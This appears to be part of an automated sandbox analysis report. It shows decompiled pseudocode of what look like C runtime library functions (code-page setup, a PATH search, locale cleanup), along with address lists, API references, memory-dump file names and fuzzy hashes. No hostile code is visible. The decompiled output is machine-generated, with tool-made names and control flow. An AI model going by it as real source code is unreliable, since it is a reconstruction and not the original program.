									_t237 =  &_v22;
									__eflags = _v22 - _t193;
									if(_v22 == _t193) {
										goto L39;
									}
									_t195 = _v32;
									while(1) {
										_t177 = _t237[1];
										__eflags = _t177;
										if(_t177 == 0) {
											break;
										}
										_t247 =  *_t237 & 0x000000ff;
										_v68 = _t247;
										__eflags = _t247 - (_t177 & 0x000000ff);
										if(_t247 > (_t177 & 0x000000ff)) {
											L37:
											_t237 =  &(_t237[2]);
											__eflags =  *_t237;
											if( *_t237 != 0) {
												continue;
											}
											break;
										}
										_v64 = _t207;
										_t180 = _t220 + 0x80 + _t247;
										_t215 = _t207 - _t220;
										__eflags = _t215;
										_t221 = _v68;
										_t248 = _t195 - 0xffffff00 + _t247 * 2;
										_v72 = _t180;
										_t197 = _t180;
										do {
											 *_t248 = 0x8000;
											_t248 = _t248 + 2;
											 *(_t197 + _t215) = _t221;
											 *_t197 = _t221;
											_t221 = _t221 + 1;
											_t197 =  &(_t197[0]);
											__eflags = _t221 - (_t237[1] & 0x000000ff);
										} while (_t221 <= (_t237[1] & 0x000000ff));
										_t220 = _v40;
										_t207 = _v36;
										_t195 = _v32;
										goto L37;
									}
									L38:
									_t193 = 0;
									goto L39;
								}
								_t198 = _v52;
								_t238 = _t154 + 0x284;
								_t216 = 0xc2;
								_t250 = _t207 - _t220;
								do {
									_t183 = _t198 + _t216;
									 *_t238 = 0x8000;
									 *((char*)(_t250 + _t183)) = _t216;
									_t238 = _t238 + 2;
									 *_t183 = _t216;
									_t216 = _t216 + 1;
								} while (_t216 < 0xf5);
								_t220 = _v40;
								goto L38;
							}
							_t272 =  *_t225 - 0xfde9;
							if( *_t225 != 0xfde9) {
								_t223 =  &_v22;
								__eflags = _v22 - _t193;
								if(__eflags == 0) {
									goto L22;
								}
								_t217 = _v44;
								while(1) {
									_t184 = _t223[1];
									__eflags = _t184;
									if(__eflags == 0) {
										break;
									}
									_t251 =  *_t223 & 0x000000ff;
									__eflags = _t251 - (_t184 & 0x000000ff);
									if(_t251 > (_t184 & 0x000000ff)) {
										L20:
										_t223 =  &(_t223[2]);
										__eflags =  *_t223 - _t193;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t251 + _t217)) = 0x20;
										_t251 = _t251 + 1;
										__eflags = _t251 - (_t223[1] & 0x000000ff);
									} while (_t251 <= (_t223[1] & 0x000000ff));
									goto L20;
								}
								_t240 = _v56;
								goto L22;
							}
							E00B4D0F0(_t225, _v44 - 0xffffff80, 0x20, 0x80);
							_t254 = _t254 + 0xc;
							goto L22;
						}
					}
				}
				_t191 = E00B5EDC5(0, _t225, _t240,  &_v92, 0, _t120, 0x1004, _t225);
				_t254 = _t253 + 0x14;
				if(_t191 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00b5570f
0x00b55716
0x00b5571b
0x00b5571e
0x00b55720
0x00b55723
0x00b55726
0x00b55729
0x00b5572f
0x00b55732
0x00b55735
0x00b55738
0x00b5573d
0x00b55afe
0x00b55b00
0x00b55b02
0x00b55b02
0x00b55b05
0x00b55b0b
0x00b55b0d
0x00b55b13
0x00b55b19
0x00b55b23
0x00b55b2d
0x00b55b34
0x00b55b43
0x00b55b43
0x00b55743
0x00b55744
0x00b55747
0x00b5574c
0x00b5576a
0x00b55774
0x00b55777
0x00b55789
0x00b5578c
0x00b5579e
0x00b557a1
0x00b557b3
0x00b557b6
0x00b557c8
0x00b557cb
0x00b557d0
0x00b557d6
0x00b55ac4
0x00b55ac7
0x00b55acf
0x00b55ad7
0x00b55adf
0x00b55ae9
0x00b55ae9
0x00000000
0x00b557e5
0x00b557e5
0x00b557ea
0x00000000
0x00b55802
0x00b55802
0x00b55804
0x00b55804
0x00b55807
0x00b55808
0x00b5581d
0x00000000
0x00000000
0x00b55823
0x00b55829
0x00000000
0x00000000
0x00b5582f
0x00b55832
0x00b55838
0x00b5588d
0x00b558b0
0x00b558b4
0x00b558b9
0x00b558bc
0x00b558be
0x00000000
0x00000000
0x00b558e6
0x00b558eb
0x00b558ee
0x00b558f0
0x00000000
0x00000000
0x00b5590a
0x00b55910
0x00b55915
0x00b5591a
0x00000000
0x00000000
0x00b55920
0x00b55929
0x00b5592f
0x00b55932
0x00b55935
0x00b55938
0x00b5593b
0x00b55941
0x00b55944
0x00b55947
0x00b55949
0x00b5594c
0x00b55952
0x00b55955
0x00b55957
0x00b55a02
0x00b55a09
0x00b55a0a
0x00b55a15
0x00b55a18
0x00b55a1a
0x00b55a24
0x00b55a27
0x00b55a29
0x00b55a32
0x00b55a34
0x00b55a36
0x00b55a37
0x00b55a42
0x00b55a47
0x00b55a4b
0x00b55a59
0x00b55a6c
0x00b55a7a
0x00b55a85
0x00b55a8a
0x00b55a4b
0x00b55a8d
0x00b55a90
0x00b55a96
0x00b55a9f
0x00b55aa4
0x00b55aad
0x00b55ab6
0x00b55abf
0x00b55aea
0x00b55aed
0x00000000
0x00b55af5
0x00b55963
0x00b55998
0x00b5599b
0x00b5599e
0x00000000
0x00000000
0x00b559a0
0x00b559a3
0x00b559a3
0x00b559a6
0x00b559a8
0x00000000
0x00000000
0x00b559aa
0x00b559b0
0x00b559b3
0x00b559b5
0x00b559f8
0x00b559f8
0x00b559fb
0x00b559fe
0x00000000
0x00000000
0x00000000
0x00b559fe
0x00b559bd
0x00b559c6
0x00b559c8
0x00b559c8
0x00b559ca
0x00b559cd
0x00b559d0
0x00b559d3
0x00b559d5
0x00b559da
0x00b559dd
0x00b559e0
0x00b559e3
0x00b559e5
0x00b559ea
0x00b559eb
0x00b559eb
0x00b559ef
0x00b559f2
0x00b559f5
0x00000000
0x00b559f5
0x00b55a00
0x00b55a00
0x00000000
0x00b55a00
0x00b55965
0x00b55968
0x00b55970
0x00b55975
0x00b5597c
0x00b5597c
0x00b5597f
0x00b55982
0x00b55985
0x00b55988
0x00b5598a
0x00b5598b
0x00b55993
0x00000000
0x00b55993
0x00b5583a
0x00b55840
0x00b5585a
0x00b5585d
0x00b55860
0x00000000
0x00000000
0x00b55862
0x00b55865
0x00b55865
0x00b55868
0x00b5586a
0x00000000
0x00000000
0x00b5586c
0x00b55872
0x00b55874
0x00b55883
0x00b55883
0x00b55886
0x00b55888
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b55876
0x00b55876
0x00b55876
0x00b5587a
0x00b5587f
0x00b5587f
0x00000000
0x00b55876
0x00b5588a
0x00000000
0x00b5588a
0x00b55850
0x00b55855
0x00000000
0x00b55855
0x00b557ea
0x00b557d6
0x00b5575a
0x00b5575f
0x00b55764
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 00B55777
_free.LIBCMT ref: 00B5578C
_free.LIBCMT ref: 00B557A1
_free.LIBCMT ref: 00B557B6
_free.LIBCMT ref: 00B557CB
GetCPInfo.KERNEL32(?,?), ref: 00B55815

Part of subcall function 00B5EDC5: _free.LIBCMT ref: 00B5EE30

_free.LIBCMT ref: 00B55A59
_free.LIBCMT ref: 00B55A6C
_free.LIBCMT ref: 00B55A7A
_free.LIBCMT ref: 00B55A85
_free.LIBCMT ref: 00B55AC7
_free.LIBCMT ref: 00B55ACF
_free.LIBCMT ref: 00B55AD7
_free.LIBCMT ref: 00B55ADF
_free.LIBCMT ref: 00B55AED

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 0d0c008fc2ab232b31df75d88e1e14231cfc6c656a355c5b10769a591a02fdf3
Instruction ID: bbfc03ec602180fa413a76a94781e5647c74f5fd3844af58e60bff97b18200fe
Opcode Fuzzy Hash: 0d0c008fc2ab232b31df75d88e1e14231cfc6c656a355c5b10769a591a02fdf3
Instruction Fuzzy Hash: 2ED19C71D006459FDF21DFA4C881BEEBBF4FF08302F5441E9E994AB292D675A849CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B56AD0, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B56AD0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int* _v48;
				signed int _t45;
				intOrPtr* _t52;
				signed int* _t53;
				signed int* _t55;
				void* _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t72;
				signed int* _t75;
				intOrPtr _t78;
				char _t82;
				void* _t84;
				void* _t87;
				signed int _t92;
				intOrPtr* _t94;
				signed int _t102;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr* _t112;
				void* _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t129;
				signed int _t130;
				void* _t132;
				char* _t134;
				intOrPtr* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				L0:
				while(1) {
					L0:
					_t45 =  *0xb69014; // 0x26ce9e99
					_v8 = _t45 ^ _t136;
					_t134 = _a8;
					_v32 = _t134;
					_v36 = _a16;
					_t129 = _a12;
					_v44 = _t129;
					if(_t134 == 0) {
						break;
					}
					L2:
					if( *_t134 == 0 || _t129 == 0) {
						break;
					} else {
						L4:
						_t52 =  *_t129;
						if(_t52 == 0) {
							break;
						} else {
							L5:
							_t53 = E00B55BBD();
							_v48 = _t53;
							if( *_t52 != 0) {
								L7:
								_push(_v36);
								_t92 =  *_t53;
								 *_t53 =  *_t53 & 0x00000000;
								_push(_t129);
								_v24 = _t92;
								_t130 = E00B56AC5(_a4, _t134);
								_t140 = _t139 + 0x10;
								if(_t130 != 0xffffffff) {
									L50:
									_t55 = _v48;
									if( *_t55 == 0 && _t92 != 0) {
										 *_t55 = _t92;
									}
									goto L54;
								} else {
									L8:
									if( *(E00B55BBD()) != 2 || E00B4CCD0(_t134, 0x5c) != 0 || E00B4CCD0(_t134, 0x2f) != 0 ||  *((char*)(_t134 + 1)) == 0x3a) {
										L12:
										_t130 = _t130 | 0xffffffff;
										goto L50;
									} else {
										L13:
										_v16 = 0x48544150;
										_t14 =  &_v16; // 0x48544150
										_v12 = 0;
										_v28 = 0;
										_t62 = E00B5185E( &_v28, 0, _t14);
										_t102 = _v28;
										_t141 = _t140 + 0xc;
										if(_t62 == 0) {
											L16:
											if(_t102 != 0) {
												L18:
												_t135 = E00B598AF(0x104, 1);
												if(_t135 == 0) {
													L47:
													_t130 = _t130 | 0xffffffff;
													goto L48;
												} else {
													L19:
													_push(0x103);
													_push(_t135);
													_t66 = E00B61446(_v28);
													_t142 = _t141 + 0xc;
													_v40 = _t66;
													if(_t66 != 0) {
														L20:
														_t94 = _v32;
														L21:
														while( *_t135 != 0) {
															_t107 = _t135;
															_t22 = _t107 + 1; // 0x1
															_t125 = _t22;
															do {
																L23:
																_t67 =  *_t107;
																_t107 = _t107 + 1;
															} while (_t67 != 0);
															_t23 = _t135 - 1; // -1
															_t132 = _t23 + _t107 - _t125;
															if(_t132 == E00B65190(_t135, 0x5c) || _t132 == E00B65190(_t135, 0x2f)) {
																L27:
																_t126 = _t135;
																_t26 = _t126 + 1; // 0x1
																_t111 = _t26;
																do {
																	L28:
																	_t69 =  *_t126;
																	_t126 = _t126 + 1;
																} while (_t69 != 0);
																_t127 = _t126 - _t111;
																_t112 = _t94;
																_t130 = _t112 + 1;
																do {
																	L30:
																	_t70 =  *_t112;
																	_t112 = _t112 + 1;
																} while (_t70 != 0);
																if(_t112 - _t130 + _t127 >= 0x104) {
																	break;
																} else {
																	L32:
																	_t72 = E00B60E2C(_t135, 0x104, _t94);
																	_t141 = _t142 + 0xc;
																	if(_t72 != 0) {
																		goto L57;
																	} else {
																		L33:
																		_t75 = E00B55BBD();
																		_push(_v36);
																		_push(_v44);
																		 *_t75 =  *_t75 & 0x00000000;
																		_t130 = E00B56AC5(_a4, _t135);
																		_t143 = _t141 + 0x10;
																		if(_t130 != 0xffffffff) {
																			L56:
																			_t92 = _v24;
																			L48:
																			E00B564B8(_t135);
																			_t102 = _v28;
																			goto L49;
																		} else {
																			L34:
																			if( *(E00B55BBD()) == 2 ||  *((intOrPtr*)(E00B55BAA())) == 0x15) {
																				L45:
																				_push(0x103);
																				_push(_t135);
																				_t78 = E00B61446(_v40);
																				_t142 = _t143 + 0xc;
																				_v40 = _t78;
																				if(_t78 != 0) {
																					continue;
																				} else {
																					break;
																				}
																			} else {
																				L36:
																				_t32 = _t135 + 1; // 0x1
																				_t130 = _t32;
																				if(E00B4CCD0(_t135, 0x2f) != _t135) {
																					L38:
																					_v17 = 0;
																				} else {
																					L37:
																					_t84 = E00B4CCD0(_t130, 0x2f);
																					_v17 = 1;
																					if(_t84 != _t130) {
																						goto L38;
																					}
																				}
																				L39:
																				if(E00B4CCD0(_t135, 0x5c) != _t135 || E00B4CCD0(_t130, 0x5c) != _t130) {
																					_t82 = 0;
																				} else {
																					_t82 = 1;
																				}
																				if(_v17 != 0 || _t82 != 0) {
																					goto L45;
																				} else {
																					break;
																				}
																			}
																		}
																	}
																}
															} else {
																L26:
																_v32 = 0x5c;
																_t87 = E00B60E2C(_t135, 0x104,  &_v32);
																_t141 = _t142 + 0xc;
																if(_t87 != 0) {
																	goto L57;
																} else {
																	goto L27;
																}
															}
															goto L55;
														}
														L46:
														_t92 = _v24;
													}
													goto L47;
												}
											} else {
												goto L17;
											}
										} else {
											L14:
											if(_t62 == 0x16) {
												L57:
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00B52919();
												asm("int3");
												L58:
												_push(_t136);
												continue;
											} else {
												L15:
												L17:
												_t130 = _t130 | 0xffffffff;
												L49:
												E00B564B8(_t102);
												_v28 = _v28 & 0x00000000;
												goto L50;
											}
										}
									}
								}
							} else {
								L6:
								 *_t53 = 0x16;
								E00B528EC();
								L54:
							}
						}
					}
					L55:
					return E00B4AE43(_v8 ^ _t136);
					L59:
				}
				L1:
				 *(E00B55BBD()) = 0x16;
				E00B528EC();
				goto L55;
			}

0x00b56ad0
0x00b56ad0
0x00b56ad0
0x00b56ad8
0x00b56adf
0x00b56ae6
0x00b56ae9
0x00b56aec
0x00b56af0
0x00b56af3
0x00b56af8
0x00000000
0x00000000
0x00b56b12
0x00b56b15
0x00000000
0x00b56b1b
0x00b56b1b
0x00b56b1b
0x00b56b1f
0x00000000
0x00b56b21
0x00b56b21
0x00b56b24
0x00b56b29
0x00b56b2e
0x00b56b43
0x00b56b43
0x00b56b46
0x00b56b48
0x00b56b4b
0x00b56b50
0x00b56b58
0x00b56b5a
0x00b56b60
0x00b56d69
0x00b56d69
0x00b56d6f
0x00b56d75
0x00b56d75
0x00000000
0x00b56b66
0x00b56b66
0x00b56b6e
0x00b56b92
0x00b56b92
0x00000000
0x00b56b9a
0x00b56b9a
0x00b56b9c
0x00b56ba3
0x00b56ba6
0x00b56bae
0x00b56bb2
0x00b56bb7
0x00b56bba
0x00b56bbf
0x00b56bcc
0x00b56bce
0x00b56bd8
0x00b56be4
0x00b56bea
0x00b56d51
0x00b56d51
0x00000000
0x00b56bf0
0x00b56bf0
0x00b56bf0
0x00b56bf5
0x00b56bf9
0x00b56bfe
0x00b56c01
0x00b56c06
0x00b56c0c
0x00b56c0c
0x00000000
0x00b56c0f
0x00b56c18
0x00b56c1a
0x00b56c1a
0x00b56c1d
0x00b56c1d
0x00b56c1d
0x00b56c1f
0x00b56c20
0x00b56c26
0x00b56c2c
0x00b56c37
0x00b56c67
0x00b56c67
0x00b56c69
0x00b56c69
0x00b56c6c
0x00b56c6c
0x00b56c6c
0x00b56c6e
0x00b56c6f
0x00b56c73
0x00b56c75
0x00b56c77
0x00b56c7a
0x00b56c7a
0x00b56c7a
0x00b56c7c
0x00b56c7d
0x00b56c8d
0x00000000
0x00b56c93
0x00b56c93
0x00b56c96
0x00b56c9b
0x00b56ca0
0x00000000
0x00b56ca6
0x00b56ca6
0x00b56ca6
0x00b56cab
0x00b56cae
0x00b56cb1
0x00b56cbd
0x00b56cbf
0x00b56cc5
0x00b56d8a
0x00b56d8a
0x00b56d54
0x00b56d55
0x00b56d5b
0x00000000
0x00b56ccb
0x00b56ccb
0x00b56cd3
0x00b56d32
0x00b56d32
0x00b56d37
0x00b56d3b
0x00b56d40
0x00b56d43
0x00b56d48
0x00000000
0x00000000
0x00000000
0x00000000
0x00b56cdf
0x00b56cdf
0x00b56ce2
0x00b56ce2
0x00b56cee
0x00b56d02
0x00b56d02
0x00b56cf0
0x00b56cf0
0x00b56cf3
0x00b56cf8
0x00b56d00
0x00000000
0x00000000
0x00b56d00
0x00b56d06
0x00b56d12
0x00b56d26
0x00b56d22
0x00b56d22
0x00b56d22
0x00b56d2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00b56d2c
0x00b56cd3
0x00b56cc5
0x00b56ca0
0x00b56c47
0x00b56c47
0x00b56c4a
0x00b56c57
0x00b56c5c
0x00b56c61
0x00000000
0x00000000
0x00000000
0x00000000
0x00b56c61
0x00000000
0x00b56c37
0x00b56d4e
0x00b56d4e
0x00b56d4e
0x00000000
0x00b56c06
0x00000000
0x00000000
0x00000000
0x00b56bc1
0x00b56bc1
0x00b56bc4
0x00b56d8f
0x00b56d91
0x00b56d92
0x00b56d93
0x00b56d94
0x00b56d95
0x00b56d96
0x00b56d9b
0x00b56d9e
0x00b56d9e
0x00000000
0x00b56bca
0x00b56bca
0x00b56bd0
0x00b56bd0
0x00b56d5e
0x00b56d5f
0x00b56d64
0x00000000
0x00b56d68
0x00b56bc4
0x00b56bbf
0x00b56b6e
0x00b56b30
0x00b56b30
0x00b56b30
0x00b56b36
0x00b56d79
0x00b56d79
0x00b56b2e
0x00b56b1f
0x00b56d7a
0x00b56d89
0x00000000
0x00b56d89
0x00b56afa
0x00b56aff
0x00b56b05
0x00000000

APIs

_free.LIBCMT ref: 00B56D55

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B56D5F

Strings

\, xrefs: 00B56C4A
PATH, xrefs: 00B56BA3, 00B56BA9

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: PATH$\
API String ID: 776569668-1896636505
Opcode ID: b5080be21d1e9b49dc0ba7b9145654410e369bdacba0db6ebe9170d4c50901e8
Instruction ID: 8ec19e3b9b9ac156834a5a7636d16adb8267a0018a23ed51947e9fd806e3613e
Opcode Fuzzy Hash: b5080be21d1e9b49dc0ba7b9145654410e369bdacba0db6ebe9170d4c50901e8
Instruction Fuzzy Hash: F4813931A002055EEF35AF68DC42BBE7BF5DF02322F5405E9ED50AB2C2EB758D498661

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C14B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5C14B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb690c0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00B564B8(_t46);
							E00B5B26F( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00B564B8(_t47);
							E00B5B726( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00B564B8( *((intOrPtr*)(_t74 + 0x7c)));
						E00B564B8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00B564B8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00B564B8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00B5C2BE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb693d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00B564B8(_t31);
							E00B564B8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00B564B8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00B564B8(_t74);
			}

0x00b5c153
0x00b5c157
0x00b5c15f
0x00b5c168
0x00b5c16d
0x00b5c174
0x00b5c17c
0x00b5c184
0x00b5c18f
0x00b5c195
0x00b5c196
0x00b5c19e
0x00b5c1a6
0x00b5c1b1
0x00b5c1b7
0x00b5c1bb
0x00b5c1c6
0x00b5c1cc
0x00b5c16d
0x00b5c1cd
0x00b5c1d5
0x00b5c1e8
0x00b5c1fb
0x00b5c209
0x00b5c214
0x00b5c219
0x00b5c222
0x00b5c22a
0x00b5c22b
0x00b5c231
0x00b5c234
0x00b5c237
0x00b5c23e
0x00b5c240
0x00b5c244
0x00b5c24c
0x00b5c253
0x00b5c259
0x00b5c25a
0x00b5c25a
0x00b5c261
0x00b5c263
0x00b5c268
0x00b5c270
0x00b5c275
0x00b5c276
0x00b5c276
0x00b5c279
0x00b5c27c
0x00b5c27f
0x00b5c282
0x00b5c282
0x00b5c294

APIs

___free_lconv_mon.LIBCMT ref: 00B5C18F

Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B28C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B29E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2B0
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2C2
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2D4
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2E6
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2F8
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B30A
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B31C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B32E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B340
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B352
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B364

_free.LIBCMT ref: 00B5C184

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5C1A6
_free.LIBCMT ref: 00B5C1BB
_free.LIBCMT ref: 00B5C1C6
_free.LIBCMT ref: 00B5C1E8
_free.LIBCMT ref: 00B5C1FB
_free.LIBCMT ref: 00B5C209
_free.LIBCMT ref: 00B5C214
_free.LIBCMT ref: 00B5C24C
_free.LIBCMT ref: 00B5C253
_free.LIBCMT ref: 00B5C270
_free.LIBCMT ref: 00B5C288

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 98f1c9576a448aad6d578af45898e19f0d7ebca3b939e165d91dceb6bba1d3c2
Instruction ID: 1c45d8150240bda2b6ba814763cf451210cf93eeca270e3b0db7e43555373949
Opcode Fuzzy Hash: 98f1c9576a448aad6d578af45898e19f0d7ebca3b939e165d91dceb6bba1d3c2
Instruction Fuzzy Hash: ED316F32500B049FEF20AA79D845B5A7BEAEF01352F5084D9FD58D7262DF79AC488B20

Uniqueness

Uniqueness Score: -1.00%

Function 00B56543, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B56543(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				long _v28;
				long _v32;
				signed int _v36;
				void* _v44;
				void* _v48;
				signed int _v64;
				short _v66;
				char _v116;
				long _v196;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				signed int _t132;
				intOrPtr* _t133;
				signed int _t141;
				void* _t147;
				signed int _t150;
				signed int _t159;
				void* _t162;
				signed int _t163;
				intOrPtr* _t164;
				intOrPtr _t168;
				signed int _t177;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t207;
				long _t208;
				long _t210;
				void* _t212;
				signed int* _t214;
				signed int _t215;
				signed int _t220;
				long _t223;
				signed int* _t227;
				void* _t234;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t252;
				void* _t257;
				signed int _t258;
				signed char _t261;
				void* _t264;
				signed int _t266;
				signed int _t267;
				char _t269;
				void* _t270;
				unsigned int _t272;
				signed int _t274;
				signed int* _t275;
				unsigned int _t277;
				signed int _t280;
				void* _t285;
				signed int _t287;
				void* _t290;
				void* _t292;
				void* _t293;
				void* _t294;

				_push(_t217);
				_t280 = _a8;
				if(_t280 != 0) {
					__eflags =  *_t280;
					if( *_t280 == 0) {
						goto L1;
					} else {
						_t111 = _a12;
						__eflags = _t111;
						if(_t111 == 0) {
							goto L1;
						} else {
							_t112 =  *_t111;
							__eflags = _t112;
							if(_t112 == 0) {
								goto L1;
							} else {
								__eflags =  *_t112;
								if( *_t112 == 0) {
									goto L1;
								} else {
									_t266 = E00B65190(_t280, 0x5c);
									_t114 = E00B65190(_t280, 0x2f);
									_t293 = _t292 + 0x10;
									_t206 = _t280;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags = _t266;
										if(_t266 == 0) {
											L20:
											_t266 = _t114;
										} else {
											__eflags = _t114 - _t266;
											if(_t114 > _t266) {
												goto L20;
											}
										}
										goto L21;
									} else {
										__eflags = _t266;
										if(_t266 != 0) {
											L21:
											asm("sbb esi, esi");
											_t280 =  ~(_t280 - _t206) & _t206;
											_t115 = E00B65190(_t266, 0x2e);
											__eflags = _t115;
											if(_t115 == 0) {
												_t220 = _t206;
												_t257 = _t220 + 1;
												do {
													_t116 =  *_t220;
													_t220 = _t220 + 1;
													__eflags = _t116;
												} while (_t116 != 0);
												_v8 = _t220 - _t257 + 5;
												_t267 = E00B598AF(_t220 - _t257 + 5, 1);
												_pop(_t223);
												__eflags = _t267;
												if(_t267 != 0) {
													_t207 = _v8;
													_t119 = E00B56383(_t267, _t207, _t206);
													_t294 = _t293 + 0xc;
													__eflags = _t119;
													if(_t119 == 0) {
														_t188 = _t207 - 5 + _t267;
														__eflags = _t188;
														_v8 = _t188;
														_t189 = E00B55BBD();
														_t207 = 0xb35860;
														_v12 =  *_t189;
														while(1) {
															_t191 = E00B56383(_v8, 5, _t207);
															_t294 = _t294 + 0xc;
															__eflags = _t191;
															if(_t191 != 0) {
																goto L38;
															}
															_t192 = E00B56EA8(_t207, _t280, _t267, _t191);
															_pop(_t223);
